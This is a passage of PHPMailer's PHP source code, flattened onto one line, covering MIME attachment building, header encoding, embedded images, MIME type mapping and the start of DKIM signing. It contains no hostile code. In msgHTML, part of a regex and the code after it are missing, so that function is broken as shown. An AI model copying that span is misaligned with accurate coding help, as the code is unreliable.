$disposition_type * @param string $boundary * * @throws Exception * * @return string */ protected function attachAll($disposition_type, $boundary) { // Return text of body $mime = []; $cidUniq = []; $incl = []; // Add all attachments foreach ($this->attachment as $attachment) { // Check if it is a valid disposition_filter if ($attachment[6] === $disposition_type) { // Check for string attachment $string = ''; $path = ''; $bString = $attachment[5]; if ($bString) { $string = $attachment[0]; } else { $path = $attachment[0]; } $inclhash = hash('sha256', serialize($attachment)); if (in_array($inclhash, $incl, true)) { continue; } $incl[] = $inclhash; $name = $attachment[2]; $encoding = $attachment[3]; $type = $attachment[4]; $disposition = $attachment[6]; $cid = $attachment[7]; if ('inline' === $disposition && array_key_exists($cid, $cidUniq)) { continue; } $cidUniq[$cid] = true; $mime[] = sprintf('--%s%s', $boundary, static::$LE); //Only include a filename property if we have one if (!empty($name)) { $mime[] = sprintf( 'Content-Type: %s; name="%s"%s', $type, $this->encodeHeader($this->secureHeader($name)), static::$LE ); } else { $mime[] = sprintf( 'Content-Type: %s%s', $type, static::$LE ); } // RFC1341 part 5 says 7bit is assumed if not specified if (static::ENCODING_7BIT !== $encoding) { $mime[] = sprintf('Content-Transfer-Encoding: %s%s', $encoding, static::$LE); } //Only set Content-IDs on inline attachments if ((string) $cid !== '' && $disposition === 'inline') { $mime[] = 'Content-ID: <' . $this->encodeHeader($this->secureHeader($cid)) . '>' . static::$LE; } // If a filename contains any of these chars, it should be quoted, // but not otherwise: RFC2183 & RFC2045 5.1 // Fixes a warning in IETF's msglint MIME checker // Allow for bypassing the Content-Disposition header totally if (!empty($disposition)) { $encoded_name = $this->encodeHeader($this->secureHeader($name)); if (preg_match('/[ ()<>@,;:"\/\[\]?=]/', $encoded_name)) { $mime[] = sprintf( 'Content-Disposition: %s; filename="%s"%s', $disposition, $encoded_name, static::$LE . static::$LE ); } elseif (!empty($encoded_name)) { $mime[] = sprintf( 'Content-Disposition: %s; filename=%s%s', $disposition, $encoded_name, static::$LE . static::$LE ); } else { $mime[] = sprintf( 'Content-Disposition: %s%s', $disposition, static::$LE . static::$LE ); } } else { $mime[] = static::$LE; } // Encode as string attachment if ($bString) { $mime[] = $this->encodeString($string, $encoding); } else { $mime[] = $this->encodeFile($path, $encoding); } if ($this->isError()) { return ''; } $mime[] = static::$LE; } } $mime[] = sprintf('--%s--%s', $boundary, static::$LE); return implode('', $mime); } /** * Encode a file attachment in requested format. * Returns an empty string on failure. * * @param string $path The full path to the file * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable' * * @return string */ protected function encodeFile($path, $encoding = self::ENCODING_BASE64) { try { if (!static::isPermittedPath($path) || !file_exists($path)) { throw new Exception($this->lang('file_open') . $path, self::STOP_CONTINUE); } $file_buffer = file_get_contents($path); if (false === $file_buffer) { throw new Exception($this->lang('file_open') . $path, self::STOP_CONTINUE); } $file_buffer = $this->encodeString($file_buffer, $encoding); return $file_buffer; } catch (Exception $exc) { $this->setError($exc->getMessage()); return ''; } } /** * Encode a string in requested format. * Returns an empty string on failure. * * @param string $str The text to encode * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable' * * @throws Exception * * @return string */ public function encodeString($str, $encoding = self::ENCODING_BASE64) { $encoded = ''; switch (strtolower($encoding)) { case static::ENCODING_BASE64: $encoded = chunk_split( base64_encode($str), static::STD_LINE_LENGTH, static::$LE ); break; case static::ENCODING_7BIT: case static::ENCODING_8BIT: $encoded = static::normalizeBreaks($str); // Make sure it ends with a line break if (substr($encoded, -(strlen(static::$LE))) !== static::$LE) { $encoded .= static::$LE; } break; case static::ENCODING_BINARY: $encoded = $str; break; case static::ENCODING_QUOTED_PRINTABLE: $encoded = $this->encodeQP($str); break; default: $this->setError($this->lang('encoding') . $encoding); if ($this->exceptions) { throw new Exception($this->lang('encoding') . $encoding); } break; } return $encoded; } /** * Encode a header value (not including its label) optimally. * Picks shortest of Q, B, or none. Result includes folding if needed. * See RFC822 definitions for phrase, comment and text positions. * * @param string $str The header value to encode * @param string $position What context the string will be used in * * @return string */ public function encodeHeader($str, $position = 'text') { $matchcount = 0; switch (strtolower($position)) { case 'phrase': if (!preg_match('/[\200-\377]/', $str)) { // Can't use addslashes as we don't know the value of magic_quotes_sybase $encoded = addcslashes($str, "\0..\37\177\\\""); if (($str === $encoded) && !preg_match('/[^A-Za-z0-9!#$%&\'*+\/=?^_`{|}~ -]/', $str)) { return $encoded; } return "\"$encoded\""; } $matchcount = preg_match_all('/[^\040\041\043-\133\135-\176]/', $str, $matches); break; /* @noinspection PhpMissingBreakStatementInspection */ case 'comment': $matchcount = preg_match_all('/[()"]/', $str, $matches); //fallthrough case 'text': default: $matchcount += preg_match_all('/[\000-\010\013\014\016-\037\177-\377]/', $str, $matches); break; } if ($this->has8bitChars($str)) { $charset = $this->CharSet; } else { $charset = static::CHARSET_ASCII; } // Q/B encoding adds 8 chars and the charset ("` =??[QB]??=`"). $overhead = 8 + strlen($charset); if ('mail' === $this->Mailer) { $maxlen = static::MAIL_MAX_LINE_LENGTH - $overhead; } else { $maxlen = static::MAX_LINE_LENGTH - $overhead; } // Select the encoding that produces the shortest output and/or prevents corruption. if ($matchcount > strlen($str) / 3) { // More than 1/3 of the content needs encoding, use B-encode. $encoding = 'B'; } elseif ($matchcount > 0) { // Less than 1/3 of the content needs encoding, use Q-encode. $encoding = 'Q'; } elseif (strlen($str) > $maxlen) { // No encoding needed, but value exceeds max line length, use Q-encode to prevent corruption. $encoding = 'Q'; } else { // No reformatting needed $encoding = false; } switch ($encoding) { case 'B': if ($this->hasMultiBytes($str)) { // Use a custom function which correctly encodes and wraps long // multibyte strings without breaking lines within a character $encoded = $this->base64EncodeWrapMB($str, "\n"); } else { $encoded = base64_encode($str); $maxlen -= $maxlen % 4; $encoded = trim(chunk_split($encoded, $maxlen, "\n")); } $encoded = preg_replace('/^(.*)$/m', ' =?' . $charset . "?$encoding?\\1?=", $encoded); break; case 'Q': $encoded = $this->encodeQ($str, $position); $encoded = $this->wrapText($encoded, $maxlen, true); $encoded = str_replace('=' . static::$LE, "\n", trim($encoded)); $encoded = preg_replace('/^(.*)$/m', ' =?' . $charset . "?$encoding?\\1?=", $encoded); break; default: return $str; } return trim(static::normalizeBreaks($encoded)); } /** * Check if a string contains multi-byte characters. * * @param string $str multi-byte text to wrap encode * * @return bool */ public function hasMultiBytes($str) { if (function_exists('mb_strlen')) { return strlen($str) > mb_strlen($str, $this->CharSet); } // Assume no multibytes (we can't handle without mbstring functions anyway) return false; } /** * Does a string contain any 8-bit chars (in any charset)? * * @param string $text * * @return bool */ public function has8bitChars($text) { return (bool) preg_match('/[\x80-\xFF]/', $text); } /** * Encode and wrap long multibyte strings for mail headers * without breaking lines within a character. * Adapted from a function by paravoid. * * @see http://www.php.net/manual/en/function.mb-encode-mimeheader.php#60283 * * @param string $str multi-byte text to wrap encode * @param string $linebreak string to use as linefeed/end-of-line * * @return string */ public function base64EncodeWrapMB($str, $linebreak = null) { $start = '=?' . $this->CharSet . '?B?'; $end = '?='; $encoded = ''; if (null === $linebreak) { $linebreak = static::$LE; } $mb_length = mb_strlen($str, $this->CharSet); // Each line must have length <= 75, including $start and $end $length = 75 - strlen($start) - strlen($end); // Average multi-byte ratio $ratio = $mb_length / strlen($str); // Base64 has a 4:3 ratio $avgLength = floor($length * $ratio * .75); $offset = 0; for ($i = 0; $i < $mb_length; $i += $offset) { $lookBack = 0; do { $offset = $avgLength - $lookBack; $chunk = mb_substr($str, $i, $offset, $this->CharSet); $chunk = base64_encode($chunk); ++$lookBack; } while (strlen($chunk) > $length); $encoded .= $chunk . $linebreak; } // Chomp the last linefeed return substr($encoded, 0, -strlen($linebreak)); } /** * Encode a string in quoted-printable format. * According to RFC2045 section 6.7. * * @param string $string The text to encode * * @return string */ public function encodeQP($string) { return static::normalizeBreaks(quoted_printable_encode($string)); } /** * Encode a string using Q encoding. * * @see http://tools.ietf.org/html/rfc2047#section-4.2 * * @param string $str the text to encode * @param string $position Where the text is going to be used, see the RFC for what that means * * @return string */ public function encodeQ($str, $position = 'text') { // There should not be any EOL in the string $pattern = ''; $encoded = str_replace(["\r", "\n"], '', $str); switch (strtolower($position)) { case 'phrase': // RFC 2047 section 5.3 $pattern = '^A-Za-z0-9!*+\/ -'; break; /* * RFC 2047 section 5.2. * Build $pattern without including delimiters and [] */ /* @noinspection PhpMissingBreakStatementInspection */ case 'comment': $pattern = '\(\)"'; /* Intentional fall through */ case 'text': default: // RFC 2047 section 5.1 // Replace every high ascii, control, =, ? and _ characters $pattern = '\000-\011\013\014\016-\037\075\077\137\177-\377' . $pattern; break; } $matches = []; if (preg_match_all("/[{$pattern}]/", $encoded, $matches)) { // If the string contains an '=', make sure it's the first thing we replace // so as to avoid double-encoding $eqkey = array_search('=', $matches[0], true); if (false !== $eqkey) { unset($matches[0][$eqkey]); array_unshift($matches[0], '='); } foreach (array_unique($matches[0]) as $char) { $encoded = str_replace($char, '=' . sprintf('%02X', ord($char)), $encoded); } } // Replace spaces with _ (more readable than =20) // RFC 2047 section 4.2(2) return str_replace(' ', '_', $encoded); } /** * Add a string or binary attachment (non-filesystem). * This method can be used to attach ascii or binary data, * such as a BLOB record from a database. * * @param string $string String attachment data * @param string $filename Name of the attachment * @param string $encoding File encoding (see $Encoding) * @param string $type File extension (MIME) type * @param string $disposition Disposition to use * * @throws Exception * * @return bool True on successfully adding an attachment */ public function addStringAttachment( $string, $filename, $encoding = self::ENCODING_BASE64, $type = '', $disposition = 'attachment' ) { try { // If a MIME type is not specified, try to work it out from the file name if ('' === $type) { $type = static::filenameToType($filename); } if (!$this->validateEncoding($encoding)) { throw new Exception($this->lang('encoding') . $encoding); } // Append to $attachment array $this->attachment[] = [ 0 => $string, 1 => $filename, 2 => static::mb_pathinfo($filename, PATHINFO_BASENAME), 3 => $encoding, 4 => $type, 5 => true, // isStringAttachment 6 => $disposition, 7 => 0, ]; } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } return true; } /** * Add an embedded (inline) attachment from a file. * This can include images, sounds, and just about any other document type. * These differ from 'regular' attachments in that they are intended to be * displayed inline with the message, not just attached for download. * This is used in HTML messages that embed the images * the HTML refers to using the $cid value. * Never use a user-supplied path to a file! * * @param string $path Path to the attachment * @param string $cid Content ID of the attachment; Use this to reference * the content when using an embedded image in HTML * @param string $name Overrides the attachment name * @param string $encoding File encoding (see $Encoding) * @param string $type File MIME type * @param string $disposition Disposition to use * * @throws Exception * * @return bool True on successfully adding an attachment */ public function addEmbeddedImage( $path, $cid, $name = '', $encoding = self::ENCODING_BASE64, $type = '', $disposition = 'inline' ) { try { if (!static::isPermittedPath($path) || !@is_file($path)) { throw new Exception($this->lang('file_access') . $path, self::STOP_CONTINUE); } // If a MIME type is not specified, try to work it out from the file name if ('' === $type) { $type = static::filenameToType($path); } if (!$this->validateEncoding($encoding)) { throw new Exception($this->lang('encoding') . $encoding); } $filename = (string) static::mb_pathinfo($path, PATHINFO_BASENAME); if ('' === $name) { $name = $filename; } // Append to $attachment array $this->attachment[] = [ 0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, // isStringAttachment 6 => $disposition, 7 => $cid, ]; } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } return true; } /** * Add an embedded stringified attachment. * This can include images, sounds, and just about any other document type. * If your filename doesn't contain an extension, be sure to set the $type to an appropriate MIME type. * * @param string $string The attachment binary data * @param string $cid Content ID of the attachment; Use this to reference * the content when using an embedded image in HTML * @param string $name A filename for the attachment. If this contains an extension, * PHPMailer will attempt to set a MIME type for the attachment. * For example 'file.jpg' would get an 'image/jpeg' MIME type. * @param string $encoding File encoding (see $Encoding), defaults to 'base64' * @param string $type MIME type - will be used in preference to any automatically derived type * @param string $disposition Disposition to use * * @throws Exception * * @return bool True on successfully adding an attachment */ public function addStringEmbeddedImage( $string, $cid, $name = '', $encoding = self::ENCODING_BASE64, $type = '', $disposition = 'inline' ) { try { // If a MIME type is not specified, try to work it out from the name if ('' === $type && !empty($name)) { $type = static::filenameToType($name); } if (!$this->validateEncoding($encoding)) { throw new Exception($this->lang('encoding') . $encoding); } // Append to $attachment array $this->attachment[] = [ 0 => $string, 1 => $name, 2 => $name, 3 => $encoding, 4 => $type, 5 => true, // isStringAttachment 6 => $disposition, 7 => $cid, ]; } catch (Exception $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } return true; } /** * Validate encodings. * * @param string $encoding * * @return bool */ protected function validateEncoding($encoding) { return in_array( $encoding, [ self::ENCODING_7BIT, self::ENCODING_QUOTED_PRINTABLE, self::ENCODING_BASE64, self::ENCODING_8BIT, self::ENCODING_BINARY, ], true ); } /** * Check if an embedded attachment is present with this cid. * * @param string $cid * * @return bool */ protected function cidExists($cid) { foreach ($this->attachment as $attachment) { if ('inline' === $attachment[6] && $cid === $attachment[7]) { return true; } } return false; } /** * Check if an inline attachment is present. * * @return bool */ public function inlineImageExists() { foreach ($this->attachment as $attachment) { if ('inline' === $attachment[6]) { return true; } } return false; } /** * Check if an attachment (non-inline) is present. * * @return bool */ public function attachmentExists() { foreach ($this->attachment as $attachment) { if ('attachment' === $attachment[6]) { return true; } } return false; } /** * Check if this message has an alternative body set. * * @return bool */ public function alternativeExists() { return !empty($this->AltBody); } /** * Clear queued addresses of given kind. * * @param string $kind 'to', 'cc', or 'bcc' */ public function clearQueuedAddresses($kind) { $this->RecipientsQueue = array_filter( $this->RecipientsQueue, static function ($params) use ($kind) { return $params[0] !== $kind; } ); } /** * Clear all To recipients. */ public function clearAddresses() { foreach ($this->to as $to) { unset($this->all_recipients[strtolower($to[0])]); } $this->to = []; $this->clearQueuedAddresses('to'); } /** * Clear all CC recipients. */ public function clearCCs() { foreach ($this->cc as $cc) { unset($this->all_recipients[strtolower($cc[0])]); } $this->cc = []; $this->clearQueuedAddresses('cc'); } /** * Clear all BCC recipients. */ public function clearBCCs() { foreach ($this->bcc as $bcc) { unset($this->all_recipients[strtolower($bcc[0])]); } $this->bcc = []; $this->clearQueuedAddresses('bcc'); } /** * Clear all ReplyTo recipients. */ public function clearReplyTos() { $this->ReplyTo = []; $this->ReplyToQueue = []; } /** * Clear all recipient types. */ public function clearAllRecipients() { $this->to = []; $this->cc = []; $this->bcc = []; $this->all_recipients = []; $this->RecipientsQueue = []; } /** * Clear all filesystem, string, and binary attachments. */ public function clearAttachments() { $this->attachment = []; } /** * Clear all custom headers. */ public function clearCustomHeaders() { $this->CustomHeader = []; } /** * Add an error message to the error container. * * @param string $msg */ protected function setError($msg) { ++$this->error_count; if ('smtp' === $this->Mailer && null !== $this->smtp) { $lasterror = $this->smtp->getError(); if (!empty($lasterror['error'])) { $msg .= $this->lang('smtp_error') . $lasterror['error']; if (!empty($lasterror['detail'])) { $msg .= ' Detail: ' . $lasterror['detail']; } if (!empty($lasterror['smtp_code'])) { $msg .= ' SMTP code: ' . $lasterror['smtp_code']; } if (!empty($lasterror['smtp_code_ex'])) { $msg .= ' Additional SMTP info: ' . $lasterror['smtp_code_ex']; } } } $this->ErrorInfo = $msg; } /** * Return an RFC 822 formatted date. * * @return string */ public static function rfcDate() { // Set the time zone to whatever the default is to avoid 500 errors // Will default to UTC if it's not set properly in php.ini date_default_timezone_set(@date_default_timezone_get()); return date('D, j M Y H:i:s O'); } /** * Get the server hostname. * Returns 'localhost.localdomain' if unknown. * * @return string */ protected function serverHostname() { $result = ''; if (!empty($this->Hostname)) { $result = $this->Hostname; } elseif (isset($_SERVER) && array_key_exists('SERVER_NAME', $_SERVER)) { $result = $_SERVER['SERVER_NAME']; } elseif (function_exists('gethostname') && gethostname() !== false) { $result = gethostname(); } elseif (php_uname('n') !== false) { $result = php_uname('n'); } if (!static::isValidHost($result)) { return 'localhost.localdomain'; } return $result; } /** * Validate whether a string contains a valid value to use as a hostname or IP address. * IPv6 addresses must include [], e.g. `[::1]`, not just `::1`. * * @param string $host The host name or IP address to check * * @return bool */ public static function isValidHost($host) { //Simple syntax limits if (empty($host) || !is_string($host) || strlen($host) > 256 || !preg_match('/^([a-zA-Z\d.-]*|\[[a-fA-F\d:]+])$/', $host) ) { return false; } //Looks like a bracketed IPv6 address if (strlen($host) > 2 && substr($host, 0, 1) === '[' && substr($host, -1, 1) === ']') { return filter_var(substr($host, 1, -1), FILTER_VALIDATE_IP, FILTER_FLAG_IPV6) !== false; } //If removing all the dots results in a numeric string, it must be an IPv4 address. //Need to check this first because otherwise things like `999.0.0.0` are considered valid host names if (is_numeric(str_replace('.', '', $host))) { //Is it a valid IPv4 address? return filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false; } if (filter_var('http://' . $host, FILTER_VALIDATE_URL) !== false) { //Is it a syntactically valid hostname? return true; } return false; } /** * Get an error message in the current language. * * @param string $key * * @return string */ protected function lang($key) { if (count($this->language) < 1) { $this->setLanguage(); // set the default language } if (array_key_exists($key, $this->language)) { if ('smtp_connect_failed' === $key) { //Include a link to troubleshooting docs on SMTP connection failure //this is by far the biggest cause of support questions //but it's usually not PHPMailer's fault. return $this->language[$key] . ' https://github.com/PHPMailer/PHPMailer/wiki/Troubleshooting'; } return $this->language[$key]; } //Return the key as a fallback return $key; } /** * Check if an error occurred. * * @return bool True if an error did occur */ public function isError() { return $this->error_count > 0; } /** * Add a custom header. * $name value can be overloaded to contain * both header name and value (name:value). * * @param string $name Custom header name * @param string|null $value Header value */ public function addCustomHeader($name, $value = null) { if (null === $value) { // Value passed in as name:value $this->CustomHeader[] = explode(':', $name, 2); } else { $this->CustomHeader[] = [$name, $value]; } } /** * Returns all custom headers. * * @return array */ public function getCustomHeaders() { return $this->CustomHeader; } /** * Create a message body from an HTML string. * Automatically inlines images and creates a plain-text version by converting the HTML, * overwriting any existing values in Body and AltBody. * Do not source $message content from user input! * $basedir is prepended when handling relative URLs, e.g. and must not be empty * will look for an image file in $basedir/images/a.png and convert it to inline. * If you don't provide a $basedir, relative paths will be left untouched (and thus probably break in email) * Converts data-uri images into embedded attachments. * If you don't want to apply these transformations to your HTML, just set Body and AltBody directly. * * @param string $message HTML message string * @param string $basedir Absolute path to a base directory to prepend to relative paths to images * @param bool|callable $advanced Whether to use the internal HTML to text converter * or your own custom converter @return string $message The transformed message Body * * @throws Exception * * @see PHPMailer::html2text() */ public function msgHTML($message, $basedir = '', $advanced = false) { preg_match_all('/(? 1 && '/' !== substr($basedir, -1)) { // Ensure $basedir has a trailing / $basedir .= '/'; } foreach ($images[2] as $imgindex => $url) { // Convert data URIs into embedded images //e.g. "data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" if (preg_match('#^data:(image/(?:jpe?g|gif|png));?(base64)?,(.+)#', $url, $match)) { if (count($match) === 4 && static::ENCODING_BASE64 === $match[2]) { $data = base64_decode($match[3]); } elseif ('' === $match[2]) { $data = rawurldecode($match[3]); } else { //Not recognised so leave it alone continue; } //Hash the decoded data, not the URL, so that the same data-URI image used in multiple places //will only be embedded once, even if it used a different encoding $cid = substr(hash('sha256', $data), 0, 32) . '@phpmailer.0'; // RFC2392 S 2 if (!$this->cidExists($cid)) { $this->addStringEmbeddedImage( $data, $cid, 'embed' . $imgindex, static::ENCODING_BASE64, $match[1] ); } $message = str_replace( $images[0][$imgindex], $images[1][$imgindex] . '="cid:' . $cid . '"', $message ); continue; } if (// Only process relative URLs if a basedir is provided (i.e. no absolute local paths) !empty($basedir) // Ignore URLs containing parent dir traversal (..) && (strpos($url, '..') === false) // Do not change urls that are already inline images && 0 !== strpos($url, 'cid:') // Do not change absolute URLs, including anonymous protocol && !preg_match('#^[a-z][a-z0-9+.-]*:?//#i', $url) ) { $filename = static::mb_pathinfo($url, PATHINFO_BASENAME); $directory = dirname($url); if ('.' === $directory) { $directory = ''; } // RFC2392 S 2 $cid = substr(hash('sha256', $url), 0, 32) . '@phpmailer.0'; if (strlen($basedir) > 1 && '/' !== substr($basedir, -1)) { $basedir .= '/'; } if (strlen($directory) > 1 && '/' !== substr($directory, -1)) { $directory .= '/'; } if ($this->addEmbeddedImage( $basedir . $directory . $filename, $cid, $filename, static::ENCODING_BASE64, static::_mime_types((string) static::mb_pathinfo($filename, PATHINFO_EXTENSION)) ) ) { $message = preg_replace( '/' . $images[1][$imgindex] . '=["\']' . preg_quote($url, '/') . '["\']/Ui', $images[1][$imgindex] . '="cid:' . $cid . '"', $message ); } } } } $this->isHTML(); // Convert all message body line breaks to LE, makes quoted-printable encoding work much better $this->Body = static::normalizeBreaks($message); $this->AltBody = static::normalizeBreaks($this->html2text($message, $advanced)); if (!$this->alternativeExists()) { $this->AltBody = 'This is an HTML-only message. To view it, activate HTML in your email application.' . static::$LE; } return $this->Body; } /** * Convert an HTML string into plain text. * This is used by msgHTML(). * Note - older versions of this function used a bundled advanced converter * which was removed for license reasons in #232. * Example usage: * * ```php * // Use default conversion * $plain = $mail->html2text($html); * // Use your own custom converter * $plain = $mail->html2text($html, function($html) { * $converter = new MyHtml2text($html); * return $converter->get_text(); * }); * ``` * * @param string $html The HTML text to convert * @param bool|callable $advanced Any boolean value to use the internal converter, * or provide your own callable for custom conversion * * @return string */ public function html2text($html, $advanced = false) { if (is_callable($advanced)) { return $advanced($html); } return html_entity_decode( trim(strip_tags(preg_replace('/<(head|title|style|script)[^>]*>.*?<\/\\1>/si', '', $html))), ENT_QUOTES, $this->CharSet ); } /** * Get the MIME type for a file extension. * * @param string $ext File extension * * @return string MIME type of file */ public static function _mime_types($ext = '') { $mimes = [ 'xl' => 'application/excel', 'js' => 'application/javascript', 'hqx' => 'application/mac-binhex40', 'cpt' => 'application/mac-compactpro', 'bin' => 'application/macbinary', 'doc' => 'application/msword', 'word' => 'application/msword', 'xlsx' => 'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet', 'xltx' => 'application/vnd.openxmlformats-officedocument.spreadsheetml.template', 'potx' => 'application/vnd.openxmlformats-officedocument.presentationml.template', 'ppsx' => 'application/vnd.openxmlformats-officedocument.presentationml.slideshow', 'pptx' => 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'sldx' => 'application/vnd.openxmlformats-officedocument.presentationml.slide', 'docx' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.document', 'dotx' => 'application/vnd.openxmlformats-officedocument.wordprocessingml.template', 'xlam' => 'application/vnd.ms-excel.addin.macroEnabled.12', 'xlsb' => 'application/vnd.ms-excel.sheet.binary.macroEnabled.12', 'class' => 'application/octet-stream', 'dll' => 'application/octet-stream', 'dms' => 'application/octet-stream', 'exe' => 'application/octet-stream', 'lha' => 'application/octet-stream', 'lzh' => 'application/octet-stream', 'psd' => 'application/octet-stream', 'sea' => 'application/octet-stream', 'so' => 'application/octet-stream', 'oda' => 'application/oda', 'pdf' => 'application/pdf', 'ai' => 'application/postscript', 'eps' => 'application/postscript', 'ps' => 'application/postscript', 'smi' => 'application/smil', 'smil' => 'application/smil', 'mif' => 'application/vnd.mif', 'xls' => 'application/vnd.ms-excel', 'ppt' => 'application/vnd.ms-powerpoint', 'wbxml' => 'application/vnd.wap.wbxml', 'wmlc' => 'application/vnd.wap.wmlc', 'dcr' => 'application/x-director', 'dir' => 'application/x-director', 'dxr' => 'application/x-director', 'dvi' => 'application/x-dvi', 'gtar' => 'application/x-gtar', 'php3' => 'application/x-httpd-php', 'php4' => 'application/x-httpd-php', 'php' => 'application/x-httpd-php', 'phtml' => 'application/x-httpd-php', 'phps' => 'application/x-httpd-php-source', 'swf' => 'application/x-shockwave-flash', 'sit' => 'application/x-stuffit', 'tar' => 'application/x-tar', 'tgz' => 'application/x-tar', 'xht' => 'application/xhtml+xml', 'xhtml' => 'application/xhtml+xml', 'zip' => 'application/zip', 'mid' => 'audio/midi', 'midi' => 'audio/midi', 'mp2' => 'audio/mpeg', 'mp3' => 'audio/mpeg', 'm4a' => 'audio/mp4', 'mpga' => 'audio/mpeg', 'aif' => 'audio/x-aiff', 'aifc' => 'audio/x-aiff', 'aiff' => 'audio/x-aiff', 'ram' => 'audio/x-pn-realaudio', 'rm' => 'audio/x-pn-realaudio', 'rpm' => 'audio/x-pn-realaudio-plugin', 'ra' => 'audio/x-realaudio', 'wav' => 'audio/x-wav', 'mka' => 'audio/x-matroska', 'bmp' => 'image/bmp', 'gif' => 'image/gif', 'jpeg' => 'image/jpeg', 'jpe' => 'image/jpeg', 'jpg' => 'image/jpeg', 'png' => 'image/png', 'tiff' => 'image/tiff', 'tif' => 'image/tiff', 'webp' => 'image/webp', 'heif' => 'image/heif', 'heifs' => 'image/heif-sequence', 'heic' => 'image/heic', 'heics' => 'image/heic-sequence', 'eml' => 'message/rfc822', 'css' => 'text/css', 'html' => 'text/html', 'htm' => 'text/html', 'shtml' => 'text/html', 'log' => 'text/plain', 'text' => 'text/plain', 'txt' => 'text/plain', 'rtx' => 'text/richtext', 'rtf' => 'text/rtf', 'vcf' => 'text/vcard', 'vcard' => 'text/vcard', 'ics' => 'text/calendar', 'xml' => 'text/xml', 'xsl' => 'text/xml', 'wmv' => 'video/x-ms-wmv', 'mpeg' => 'video/mpeg', 'mpe' => 'video/mpeg', 'mpg' => 'video/mpeg', 'mp4' => 'video/mp4', 'm4v' => 'video/mp4', 'mov' => 'video/quicktime', 'qt' => 'video/quicktime', 'rv' => 'video/vnd.rn-realvideo', 'avi' => 'video/x-msvideo', 'movie' => 'video/x-sgi-movie', 'webm' => 'video/webm', 'mkv' => 'video/x-matroska', ]; $ext = strtolower($ext); if (array_key_exists($ext, $mimes)) { return $mimes[$ext]; } return 'application/octet-stream'; } /** * Map a file name to a MIME type. * Defaults to 'application/octet-stream', i.e.. arbitrary binary data. * * @param string $filename A file name or full path, does not need to exist as a file * * @return string */ public static function filenameToType($filename) { // In case the path is a URL, strip any query string before getting extension $qpos = strpos($filename, '?'); if (false !== $qpos) { $filename = substr($filename, 0, $qpos); } $ext = static::mb_pathinfo($filename, PATHINFO_EXTENSION); return static::_mime_types($ext); } /** * Multi-byte-safe pathinfo replacement. * Drop-in replacement for pathinfo(), but multibyte- and cross-platform-safe. * * @see http://www.php.net/manual/en/function.pathinfo.php#107461 * * @param string $path A filename or path, does not need to exist as a file * @param int|string $options Either a PATHINFO_* constant, * or a string name to return only the specified piece * * @return string|array */ public static function mb_pathinfo($path, $options = null) { $ret = ['dirname' => '', 'basename' => '', 'extension' => '', 'filename' => '']; $pathinfo = []; if (preg_match('#^(.*?)[\\\\/]*(([^/\\\\]*?)(\.([^.\\\\/]+?)|))[\\\\/.]*$#m', $path, $pathinfo)) { if (array_key_exists(1, $pathinfo)) { $ret['dirname'] = $pathinfo[1]; } if (array_key_exists(2, $pathinfo)) { $ret['basename'] = $pathinfo[2]; } if (array_key_exists(5, $pathinfo)) { $ret['extension'] = $pathinfo[5]; } if (array_key_exists(3, $pathinfo)) { $ret['filename'] = $pathinfo[3]; } } switch ($options) { case PATHINFO_DIRNAME: case 'dirname': return $ret['dirname']; case PATHINFO_BASENAME: case 'basename': return $ret['basename']; case PATHINFO_EXTENSION: case 'extension': return $ret['extension']; case PATHINFO_FILENAME: case 'filename': return $ret['filename']; default: return $ret; } } /** * Set or reset instance properties. * You should avoid this function - it's more verbose, less efficient, more error-prone and * harder to debug than setting properties directly. * Usage Example: * `$mail->set('SMTPSecure', static::ENCRYPTION_STARTTLS);` * is the same as: * `$mail->SMTPSecure = static::ENCRYPTION_STARTTLS;`. * * @param string $name The property name to set * @param mixed $value The value to set the property to * * @return bool */ public function set($name, $value = '') { if (property_exists($this, $name)) { $this->$name = $value; return true; } $this->setError($this->lang('variable_set') . $name); return false; } /** * Strip newlines to prevent header injection. * * @param string $str * * @return string */ public function secureHeader($str) { return trim(str_replace(["\r", "\n"], '', $str)); } /** * Normalize line breaks in a string. * Converts UNIX LF, Mac CR and Windows CRLF line breaks into a single line break format. * Defaults to CRLF (for message bodies) and preserves consecutive breaks. * * @param string $text * @param string $breaktype What kind of line break to use; defaults to static::$LE * * @return string */ public static function normalizeBreaks($text, $breaktype = null) { if (null === $breaktype) { $breaktype = static::$LE; } // Normalise to \n $text = str_replace(["\r\n", "\r"], "\n", $text); // Now convert LE as needed if ("\n" !== $breaktype) { $text = str_replace("\n", $breaktype, $text); } return $text; } /** * Return the current line break format string. * * @return string */ public static function getLE() { return static::$LE; } /** * Set the line break format string, e.g. "\r\n". * * @param string $le */ protected static function setLE($le) { static::$LE = $le; } /** * Set the public and private key files and password for S/MIME signing. * * @param string $cert_filename * @param string $key_filename * @param string $key_pass Password for private key * @param string $extracerts_filename Optional path to chain certificate */ public function sign($cert_filename, $key_filename, $key_pass, $extracerts_filename = '') { $this->sign_cert_file = $cert_filename; $this->sign_key_file = $key_filename; $this->sign_key_pass = $key_pass; $this->sign_extracerts_file = $extracerts_filename; } /** * Quoted-Printable-encode a DKIM header. * * @param string $txt * * @return string */ public function DKIM_QP($txt) { $line = ''; $len = strlen($txt); for ($i = 0; $i < $len; ++$i) { $ord = ord($txt[$i]); if (((0x21 <= $ord) && ($ord <= 0x3A)) || $ord === 0x3C || ((0x3E <= $ord) && ($ord <= 0x7E))) { $line .= $txt[$i]; } else { $line .= '=' . sprintf('%02X', $ord); } } return $line; } /** * Generate a DKIM signature. * * @param string $signHeader * * @throws Exception * * @return string The DKIM signature value */ public function DKIM_Sign($signHeader) { if (!defined('PKCS7_TEXT')) { if ($this->exceptions) { throw new Exception($this->lang('extension_missing') . 'openssl'); } return ''; } $privKeyStr = !empty($this->DKIM_private_string) ? $this->DKIM_private_string : file_get_contents($this->DKIM_private); if ('' !== 